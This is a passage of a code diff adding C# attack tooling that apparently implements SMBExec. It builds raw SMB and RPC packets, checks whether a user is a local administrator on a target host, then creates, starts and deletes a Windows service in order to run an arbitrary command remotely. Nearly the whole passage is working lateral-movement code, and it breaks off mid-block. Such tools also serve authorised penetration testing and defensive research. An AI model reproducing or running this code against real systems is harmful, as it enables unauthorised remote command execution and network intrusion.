+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2e }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBReadAndXRequest(SMB_FID);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            byte[] SMB_Sign2 = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign2);
+                                            byte[] SMB_Signature2 = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature2;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = SMB_client_stage_next;
+                                    }
+                                    break;
+
+                                case "OpenSCManagerW":
+                                    {
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+
+                                        OrderedDictionary packet_SCM_data = SMBExec.SCMOpenSCManagerW(SMB_service_bytes, SMB_service_length);
+                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_Data = SMBExec.SMBWriteAndXRequest(SMB_FID, (RPC_data.Length + SCM_data.Length));
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_Data);
+                                        int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_NetBIOS_Session_Service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_Session_Service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_Session_Service);
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_Session_Service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "ReadAndXRequest";
+                                        SMB_client_stage_next = "CheckAccess";
+                                    }
+                                    break;
+                                case "CheckAccess":
+                                    {
+                                        if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
+                                        {
+                                            SMB_service_manager_context_handle = Utilities.GetByteRange(SMBClientReceive, 88, 107);
+                                            if (SMB_execute)
+                                            {
+                                                OrderedDictionary packet_SCM_data = SMBExec.SCMCreateServiceW(SMB_service_manager_context_handle, SMB_service_bytes, SMB_service_length, SMBExec_command, SMBExec_command_length_bytes);
+                                                SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                                if (SCM_data.Length < SMB_split_index)
+                                                {
+                                                    SMBClientStage = "CreateServiceW";
+                                                }
+                                                else
+                                                {
+                                                    SMBClientStage = "CreateServiceW_First";
+                                                }
+                                            }
+                                            else
+                                            {
+                                                output.AppendLine(String.Format("{0} is a local administrator on {1}", output_username, target));
+                                                SMB_close_service_handle_stage = 2;
+                                                SMBClientStage = "CloseServiceHandle";
+                                            }
+
+                                        }
+                                        else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "05-00-00-00")
+                                        {
+                                            output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", output_username, target));
+                                            return output.ToString();
+                                        }
+                                        else
+                                        {
+                                            if (debug)
+                                            {
+                                                output.AppendLine(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)));
+                                                output.AppendLine(BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 107)));
+                                            }
+                                            output.AppendLine(String.Format("Something went wrong with {0}", target));
+                                            return output.ToString();
+                                        }
+
+                                    }
+
+                                    break;
+
+                                case "CreateServiceW":
+                                    {
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+
+                                        OrderedDictionary packet_SCM_data = SMBExec.SCMCreateServiceW(SMB_service_manager_context_handle, SMB_service_bytes, SMB_service_length, SMBExec_command, SMBExec_command_length_bytes);
+                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length + SCM_data.Length);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "ReadAndXRequest";
+                                        SMB_client_stage_next = "StartServiceW";
+                                    }
+                                    break;
+                                case "CreateServiceW_First":
+                                    {
+                                        SMB_split_stage_final = Math.Ceiling((double)SCM_data.Length / SMB_split_index);
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SCM_data_first = Utilities.GetByteRange(SCM_data, 0, SMB_split_index - 1);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_first);
+                                        packet_RPC_data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_data.Length);
+                                        SMB_split_index_tracker = SMB_split_index;
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        int RPC_data_length = SMB_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        if (SMB_split_stage_final <= 2)
+                                        {
+                                            SMBClientStage = "CreateServiceW_Last";
+                                        }
+                                        else
+                                        {
+                                            SMB_split_stage = 2;
+                                            SMBClientStage = "CreateServiceW_Middle";
+                                        }
+                                    }
+                                    break;
+                                case "CreateServiceW_Middle":
+                                    {
+                                        SMB_split_stage++;
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SCM_data_middle = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SMB_split_index_tracker + SMB_split_index - 1);
+                                        SMB_split_index_tracker += SMB_split_index;
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_middle);
+                                        packet_RPC_data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_data.Length - SMB_split_index_tracker + SMB_split_index);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        int RPC_data_length = SMB_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        if (SMB_split_stage >= SMB_split_stage_final)
+                                        {
+                                            SMBClientStage = "CreateServiceW_Last";
+                                        }
+                                        else
+                                        {
+                                            SMBClientStage = "CreateServiceW_Middle";
+                                        }
+
+                                    }
+                                    break;
+
+                                case "CreateServiceW_Last":
+                                    {
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x48 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        byte[] SCM_data_last = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SCM_data.Length);
+                                        SMB_split_index_tracker += SMB_split_index;
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_last);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        int RPC_data_length = SMB_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "ReadAndXRequest";
+                                        SMB_client_stage_next = "StartServiceW";
+                                    }
+                                    break;
+
+                                case "StartServiceW":
+                                    {
+                                        if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "00-00-00-00")
+                                        {
+                                            SMB_service_context_handle = Utilities.GetByteRange(SMBClientReceive, 92, 111);
+                                            packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+                                            if (SMB_signing)
+                                            {
+                                                packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                                SMB_signing_counter += 2;
+                                                byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                                packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            }
+                                            OrderedDictionary packet_SCM_data = SMBExec.SCMStartServiceW(SMB_service_context_handle);
+                                            SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                            OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
+                                            byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                            byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length + SCM_data.Length);
+                                            byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                            int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
+                                            OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
+                                            byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                            if (SMB_signing)
+                                            {
+                                                MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                                byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                                SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                                SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                                SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                                byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                                SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                                packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                                SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            }
+                                            SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                            SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                            SMBClientStage = "ReadAndXRequest";
+                                            SMB_client_stage_next = "DeleteServiceW";
+                                        }
+                                        else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 112, 115)) == "31-04-00-00")
+                                        {
+                                            output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_service, target));
+                                            return output.ToString();
+                                        }
+                                        else
+                                        {
+                                            output.AppendLine("Service Creation Fault Context Mismatch");
+                                            return output.ToString();
+                                        }
+                                    }
+                                    break;
+                                case "DeleteServiceW":
+                                    {
+                                        if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "1D-04-00-00")
+                                        {
+                                            if (debug) { output.AppendLine(String.Format("Command Executed with ServiceName: {0} on {1}", SMB_service, target)); }
+                                        }
+                                        else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 88, 91)) == "02-00-00-00")
+                                        {
+                                            SMBExec_failed = true;
+                                            if (debug) { output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_service, target)); }
+                                        }
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+
+                                        OrderedDictionary packet_SCM_data = SMBExec.SCMDeleteServiceW(SMB_service_context_handle);
+                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x04, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length + SCM_data.Length);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        }
+                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMBClientStage = "ReadAndXRequest";
+                                        SMB_client_stage_next = "CloseServiceHandle";
+                                        SMB_close_service_handle_stage = 1;
+                                    }
+                                    break;
+                                case "CloseServiceHandle":
+                                    {
+                                        OrderedDictionary packet_SCM_data = new OrderedDictionary();
+                                        if (SMB_close_service_handle_stage == 1)
+                                        {
+                                            if (debug) { output.AppendLine(String.Format("Service {0} deleted on {1}", SMB_service, target)); }
+                                            service_deleted = true;
+                                            SMB_close_service_handle_stage++;
+                                            packet_SCM_data = SMBExec.SCMCloseServiceHandle(SMB_service_context_handle);
+                                        }
+                                        else
+                                        {
+                                            SMBClientStage = "CloseRequest";
+                                            packet_SCM_data = SMBExec.SCMCloseServiceHandle(SMB_service_manager_context_handle);
+                                        }
+                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x2f }, new byte[] { 0x18 }, new byte[] { 0x05, 0x28 }, SMB_tree_ID, process_ID_Bytes, SMB_user_ID);
+
+                                        if (SMB_signing)
+                                        {
+                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_signing_counter += 2;
+                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                        }
+                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
+                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x05, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, null);
+                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
+                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                        OrderedDictionary packet_SMB_data = SMBExec.SMBWriteAndXRequest(SMB_FID, RPC_data.Length + SCM_data.Length);
+                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
+                                        int RPC_data_length = SMB_data.Length + SCM_data.Length + RPC_data.Length;
+                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, RPC_data_length);
+                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        if (SMB_signing)
+                                        {
+                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
+                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
+                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
